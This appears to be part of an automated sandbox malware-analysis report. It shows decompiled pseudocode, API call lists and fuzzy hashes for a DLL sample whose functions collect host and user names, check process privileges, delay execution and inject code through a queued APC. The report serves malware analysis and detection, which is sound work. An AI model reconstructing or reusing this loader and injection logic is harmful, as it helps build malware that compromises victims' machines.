							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0xdea37c; // 0x3d19630
							 *_t56 = 0xdeb83e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0xdea290, _t84, 0x43);
							__eflags = _t42;
							 *0xdea314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0xdea2b4; // 0x2000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0xdea2d4; // 0x2f2d5a8
								_t19 = _t76 + 0xdeb53a; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xde92a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E00DE4454( ~_v8 &  *0xdea2c8, 0xdea00c); // executed
								_t84 = E00DE2206(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E00DE1376();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E00DE2022(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E00DE2439(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0xdea14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E00DE6BE1(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x00de53f2
0x00de53fd
0x00de5400
0x00de5403
0x00de5406
0x00de540d
0x00de540f
0x00de541b
0x00de541d
0x00de541d
0x00de5426
0x00de542e
0x00de5431
0x00de544b
0x00de5450
0x00de5451
0x00de5453
0x00de5458
0x00de545d
0x00de545f
0x00de5466
0x00de5470
0x00de5476
0x00de5483
0x00de548a
0x00de548f
0x00de548f
0x00de5498
0x00de54c1
0x00de54c4
0x00de54d1
0x00de54d8
0x00de54e4
0x00de54e6
0x00de54e8
0x00de54ed
0x00de54f3
0x00de54f9
0x00de54ff
0x00de5502
0x00de5507
0x00de550f
0x00de5511
0x00de5511
0x00de5514
0x00de5514
0x00de551a
0x00de551f
0x00de5527
0x00de552c
0x00de5531
0x00de5533
0x00de5538
0x00de5567
0x00de553a
0x00de553f
0x00de5544
0x00de5549
0x00de5550
0x00de5556
0x00de555b
0x00de5561
0x00de5561
0x00de5568
0x00de556a
0x00de5579
0x00de557f
0x00de5581
0x00de5586
0x00de55b2
0x00de5588
0x00de5588
0x00de558e
0x00de559b
0x00de55a1
0x00de55a1
0x00de55a9
0x00de55ab
0x00de55b3
0x00de55b5
0x00de55bc
0x00de55c9
0x00de55d3
0x00de55d5
0x00de55d7
0x00000000
0x00000000
0x00de55d9
0x00de55de
0x00de55e0
0x00de55e7
0x00de55eb
0x00de55ee
0x00de5603
0x00de5607
0x00de560c
0x00000000
0x00de560c
0x00de55f0
0x00de55f2
0x00000000
0x00000000
0x00de55f4
0x00de55fd
0x00de55ff
0x00de5601
0x00000000
0x00000000
0x00000000
0x00de5601
0x00de55e4
0x00de55e4
0x00de55b5
0x00de549a
0x00de549a
0x00de549f
0x00de560e
0x00de5612
0x00de561a
0x00de561a
0x00000000
0x00de5612
0x00de54a5
0x00de54a8
0x00de54a8
0x00de54aa
0x00de54ad
0x00de54b5
0x00de54bc
0x00000000
0x00de5622
0x00de5622
0x00de5625
0x00de562a
0x00de562a

APIs

Part of subcall function 00DE58F8: GetModuleHandleA.KERNEL32(4C44544E,00000000,00DE540B,00000000,00000000,00000000,?,?,?,?,?,00DE6BD8,?,00000001), ref: 00DE5907

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00DEA2FC,00000000), ref: 00DE5476
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00DE6BD8,?,00000001), ref: 00DE548F
wsprintfA.USER32 ref: 00DE550F
memset.NTDLL ref: 00DE553F
RtlInitializeCriticalSection.NTDLL(03D195F0), ref: 00DE5550
RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 00DE5579
wsprintfA.USER32 ref: 00DE55A9

Part of subcall function 00DE4454: GetUserNameW.ADVAPI32(00000000,00DE55CE), ref: 00DE448B
Part of subcall function 00DE4454: RtlAllocateHeap.NTDLL(00000000,00DE55CE), ref: 00DE44A2
Part of subcall function 00DE4454: GetUserNameW.ADVAPI32(00000000,00DE55CE), ref: 00DE44AF
Part of subcall function 00DE4454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00DE55CE,?,?,?,?,?,00DE6BD8,?,00000001), ref: 00DE44D0
Part of subcall function 00DE4454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DE44F7
Part of subcall function 00DE4454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00DE450B
Part of subcall function 00DE4454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DE4518
Part of subcall function 00DE4454: HeapFree.KERNEL32(00000000,00000000), ref: 00DE4536

Part of subcall function 00DE6837: RtlAllocateHeap.NTDLL(00000000,00000000,00DE4197), ref: 00DE6843

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: f9f158935a77fe0ac767d5c797ac1874a1baf61d1901ab1f798668180ca9ad94
Instruction ID: cd98404b38440891a3338b495c7dabba0ff2e0625f219f878ad40b1601fdb793
Opcode Fuzzy Hash: f9f158935a77fe0ac767d5c797ac1874a1baf61d1901ab1f798668180ca9ad94
Instruction Fuzzy Hash: E0512571D00796ABDB21FBAAEC85B6E77B8EB04744F180115E504EB394D770ED408BB2

Uniqueness

Uniqueness Score: -1.00%

Function 00DE113D, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00DE113D(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xdea2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00DE6837(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00DE50CA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00de114a
0x00de1151
0x00de1158
0x00de116c
0x00de1177
0x00de118f
0x00de119c
0x00de119f
0x00de11a4
0x00de11af
0x00de11b3
0x00de11c2
0x00de11c6
0x00de11e2
0x00de11e2
0x00de11e6
0x00de11e6
0x00de11eb
0x00de11ef
0x00de11f5
0x00de11f6
0x00de11fd
0x00de1203

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00DE116F
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00DE118F
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00DE119F
CloseHandle.KERNEL32(00000000), ref: 00DE11EF

Part of subcall function 00DE6837: RtlAllocateHeap.NTDLL(00000000,00000000,00DE4197), ref: 00DE6843

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00DE11C2
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00DE11CA
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00DE11DA

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: a9866a96ee47b390befa530422ff3c9fb4f1f235e3a88959e551ff10383c56ad
Instruction ID: 5f77be66d434c882e65435197673f42c229884817df688d8d6566b398878a290
Opcode Fuzzy Hash: a9866a96ee47b390befa530422ff3c9fb4f1f235e3a88959e551ff10383c56ad
Instruction Fuzzy Hash: FE212C79900259FFEB11AF95DC84EAEBB79FB08344F004065E611A62A1D7719E44EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DE6B0F, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00DE6B0F(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0xdea290 = _t14;
				if(_t14 != 0) {
					 *0xdea180 = GetTickCount();
					_t16 = E00DE4C1B(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L00DE7EEA();
						_t40 = _t18 + _t20;
						_t22 = E00DE414A(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0xdea2ac; // 0x238
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0xdea2b8 = 1; // executed
						}
					}
					_t16 = E00DE53F2(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x00de6b0f
0x00de6b24
0x00de6b2c
0x00de6b31
0x00de6b44
0x00de6b49
0x00de6b50
0x00de6bd8
0x00de6bde
0x00000000
0x00000000
0x00000000
0x00de6b56
0x00de6b56
0x00de6b5b
0x00de6b61
0x00de6b67
0x00de6b71
0x00de6b75
0x00de6b76
0x00de6b7b
0x00de6b7c
0x00de6b7d
0x00de6b82
0x00de6b88
0x00de6b91
0x00de6b97
0x00de6b9d
0x00de6ba2
0x00de6ba9
0x00de6bad
0x00de6bb5
0x00de6bbd
0x00de6bbf
0x00de6bbf
0x00de6bc7
0x00de6bc9
0x00de6bc9
0x00de6bc7
0x00de6bd3
0x00000000
0x00de6bd3
0x00de6b35
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00DE6B24
GetTickCount.KERNEL32 ref: 00DE6B3B
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00DE6B5B
SwitchToThread.KERNEL32(?,00000001), ref: 00DE6B61
_aullrem.NTDLL(?,?,00000009,00000000), ref: 00DE6B7D
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 00DE6B97
IsWow64Process.KERNEL32(00000238,?,?,00000001), ref: 00DE6BB5

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID:
API String ID: 3690864001-0
Opcode ID: d194c23b90343348aedc078943c58d715a4a6f64d542410a7bf859098694dc6e
Instruction ID: b9122bd2c75d4736451301c10f49554bf949ab09f6274266c53cc2528704b3ec
Opcode Fuzzy Hash: d194c23b90343348aedc078943c58d715a4a6f64d542410a7bf859098694dc6e
Instruction Fuzzy Hash: BA21D2B2A04394AFC710FF6ADCD9A6A77A8EB543A1F40492DF549CA251E770DC048B71

Uniqueness

Uniqueness Score: -1.00%

Function 00DE624D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00DE624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xdea2d4; // 0x2f2d5a8
				_t1 = _t9 + 0xdeb60c; // 0x253d7325
				_t36 = 0;
				_t28 = E00DE278C(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x3d19631
					_t40 = E00DE6837(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E00DE49FE(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E00DE50CA(_t40);
						_t42 = E00DE7565(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00DE50CA(_t36);
							_t36 = _t42;
						}
						_t43 = E00DE52E5(_t36, _t33);
						if(_t43 != 0) {
							E00DE50CA(_t36);
							_t36 = _t43;
						}
					}
					E00DE50CA(_t28);
				}
				return _t36;
			}

0x00de624d
0x00de6250
0x00de6251
0x00de6258
0x00de625f
0x00de6266
0x00de626a
0x00de6271
0x00de6278
0x00de627d
0x00de6285
0x00de628f
0x00de6293
0x00de6297
0x00de629d
0x00de62a2
0x00de62ac
0x00de62b2
0x00de62b4
0x00de62cb
0x00de62cf
0x00de62d2
0x00de62d7
0x00de62d7
0x00de62e0
0x00de62e4
0x00de62e7
0x00de62ec
0x00de62ec
0x00de62e4
0x00de62ef
0x00de62f4
0x00de62fa

APIs

Part of subcall function 00DE278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00DE6266,253D7325,00000000,00000000,?,00000000,00DE70D9), ref: 00DE27F3
Part of subcall function 00DE278C: sprintf.NTDLL ref: 00DE2814

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE6278
lstrlen.KERNEL32(00000000,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE6280

Part of subcall function 00DE6837: RtlAllocateHeap.NTDLL(00000000,00000000,00DE4197), ref: 00DE6843

strcpy.NTDLL ref: 00DE6297
lstrcat.KERNEL32(00000000,00000000), ref: 00DE62A2

Part of subcall function 00DE49FE: lstrlen.KERNEL32(00000000,00000000,00DE70D9,00000000,?,00DE62B1,00000000,00DE70D9,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE4A0F

Part of subcall function 00DE50CA: RtlFreeHeap.NTDLL(00000000,00000000,00DE4239,00000000,00000001,?,00000000,?,?,?,00DE6B8D,00000000,?,00000001), ref: 00DE50D6

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DE70D9,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE62BF

Part of subcall function 00DE7565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00DE62CB,00000000,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE756F
Part of subcall function 00DE7565: _snprintf.NTDLL ref: 00DE75CD

Strings

=, xrefs: 00DE62B9

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: fc7beefdbc9a798cdb8fc9861f425b84ec81d8b430ae4285b7193bc4a0fded11
Instruction ID: da778649753442e77d186bc8c2b18d08f5949ac7854b35ab475d5aad13146b50
Opcode Fuzzy Hash: fc7beefdbc9a798cdb8fc9861f425b84ec81d8b430ae4285b7193bc4a0fded11
Instruction Fuzzy Hash: D111C2339016A57787127BBA9C85C7F37ADEE557A43094015FA00EB202DE35DD0297F5

Uniqueness

Uniqueness Score: -1.00%

Function 6D49C3C0, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 406
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(6D55F8D8,0000317D,6D4C85C8,000001B4,-00000040), ref: 6D49C69A
GetCurrentDirectoryA.KERNEL32(00000646,C:\Users\user\Desktop), ref: 6D49C895

Strings

!, xrefs: 6D49C8A0
}1, xrefs: 6D49C3CE
C:\Users\user\Desktop, xrefs: 6D49C88B

Memory Dump Source

Source File: 00000000.00000002.925010654.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d47e000_loaddll32.jbxd

Similarity

API ID: CurrentDirectoryProtectVirtual
String ID: !$C:\Users\user\Desktop$}1
API String ID: 3548899580-1916678420
Opcode ID: b096ea746419be11b360ec7ea6d48d414d878ff650df140c598e5b1172b561c5
Instruction ID: cd771fcc6a4fddc856b40e1955cb7b8fd367b0e22fd5e7bcc987599ab6f5f536
Opcode Fuzzy Hash: b096ea746419be11b360ec7ea6d48d414d878ff650df140c598e5b1172b561c5
Instruction Fuzzy Hash: 9A122B74A04145CFCB48EF6DC690AAABFF2FB9E304B1081AAD4459B385D7B49E12CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D471060, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6D471060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6D471B58(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6d4741d0 + 0x6d475014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6d4741d0 + 0x6d4750e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6D47142F(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6d4741d0 + 0x6d4750f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6d4741d0 + 0x6d475104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6d4741d0 + 0x6d475119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6d4741d0 + 0x6d47512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6D471B9C(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6d47106e
0x6d471072
0x6d471133
0x6d471078
0x6d471090
0x6d47109f
0x6d4710a6
0x6d4710aa
0x6d4710ad
0x6d47112b
0x6d47112c
0x6d4710af
0x6d4710bc
0x6d4710c0
0x6d4710c3
0x00000000
0x6d4710c5
0x6d4710d2
0x6d4710d6
0x6d4710d9
0x00000000
0x6d4710db
0x6d4710e8
0x6d4710ec
0x6d4710ef
0x00000000
0x6d4710f1
0x6d4710fe
0x6d471102
0x6d471105
0x00000000
0x6d471107
0x6d47110d
0x6d471113
0x6d471118
0x6d47111f
0x6d471122
0x00000000
0x6d471124
0x6d471127
0x6d471127
0x6d471122
0x6d471105
0x6d4710ef
0x6d4710d9
0x6d4710c3
0x6d4710ad
0x6d471141

APIs

Part of subcall function 6D471B58: HeapAlloc.KERNEL32(00000000,?,6D471702,?,00000000,00000000,?,?,?,6D471CE6), ref: 6D471B64

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6D471480,?,?,?,?,00000002,00000000,?,?), ref: 6D471084
GetProcAddress.KERNEL32(00000000,?), ref: 6D4710A6
GetProcAddress.KERNEL32(00000000,?), ref: 6D4710BC
GetProcAddress.KERNEL32(00000000,?), ref: 6D4710D2
GetProcAddress.KERNEL32(00000000,?), ref: 6D4710E8
GetProcAddress.KERNEL32(00000000,?), ref: 6D4710FE

Part of subcall function 6D471B9C: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6D471BF9
Part of subcall function 6D471B9C: memset.NTDLL ref: 6D471C1B

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 35ed42c00bbe8d6c72fa6c0e4c99088fa14834a3b1bea138a6ff91c8f24f1cc7
Instruction ID: fd9636f37758f8130a63061369a99ea2c4776a4ce979fbea99913b84d52d478a
Opcode Fuzzy Hash: 35ed42c00bbe8d6c72fa6c0e4c99088fa14834a3b1bea138a6ff91c8f24f1cc7
Instruction Fuzzy Hash: 49212FB160061ADFDB10FF69D984EAA7BF8EB0D644B119425E955CB205E730ED12CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D471DAE, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6d474188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6d47418c;
						if( *0x6d47418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6d474198;
								if( *0x6d474198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6d47418c);
						}
						HeapDestroy( *0x6d474190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6d474188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6d474190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6d4741b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6D4713D1(E6D4720CE, E6D47121C(_a12, 1, 0x6d474198, _t41));
							 *0x6d47418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6d471db1
0x6d471dbd
0x6d471dbf
0x6d471dc2
0x6d471e38
0x6d471e3e
0x6d471e40
0x6d471e42
0x6d471e48
0x6d471e4a
0x6d471e4f
0x6d471e52
0x6d471e5d
0x6d471e5f
0x00000000
0x00000000
0x6d471e61
0x6d471e64
0x6d471e66
0x00000000
0x00000000
0x00000000
0x6d471e66
0x6d471e6e
0x6d471e6e
0x6d471e7a
0x6d471e7a
0x6d471dc4
0x6d471dc5
0x6d471de5
0x6d471deb
0x6d471ded
0x6d471df2
0x6d471e2e
0x6d471e2e
0x6d471df4
0x6d471dfc
0x6d471e03
0x6d471e0d
0x6d471e19
0x6d471e20
0x6d471e25
0x6d471e2a
0x00000000
0x6d471e2a
0x6d471e25
0x6d471df2
0x6d471dc5
0x6d471e87

APIs

InterlockedIncrement.KERNEL32(6D474188), ref: 6D471DD0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6D471DE5

Part of subcall function 6D4713D1: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6D474198,6D471E1E), ref: 6D4713E8
Part of subcall function 6D4713D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D4713FD
Part of subcall function 6D4713D1: GetLastError.KERNEL32(00000000), ref: 6D471408
Part of subcall function 6D4713D1: TerminateThread.KERNEL32(00000000,00000000), ref: 6D471412
Part of subcall function 6D4713D1: CloseHandle.KERNEL32(00000000), ref: 6D471419
Part of subcall function 6D4713D1: SetLastError.KERNEL32(00000000), ref: 6D471422

InterlockedDecrement.KERNEL32(6D474188), ref: 6D471E38
SleepEx.KERNEL32(00000064,00000001), ref: 6D471E52
CloseHandle.KERNEL32 ref: 6D471E6E
HeapDestroy.KERNEL32 ref: 6D471E7A

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 636b9c34abc85f49aefcbc29016677a492a74900296787f12a6bbc821cc6dbc2
Instruction ID: 50e8a665e6b664cdc15cd44e1b67cfe99d3493d43a08c3a32c34a061116b08a9
Opcode Fuzzy Hash: 636b9c34abc85f49aefcbc29016677a492a74900296787f12a6bbc821cc6dbc2
Instruction Fuzzy Hash: 13215171600256EBDB20BFA9C898FAA7BB9F75B7B4B211129F519D3244D730DD00CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4713D1, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4713D1(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6d4741cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
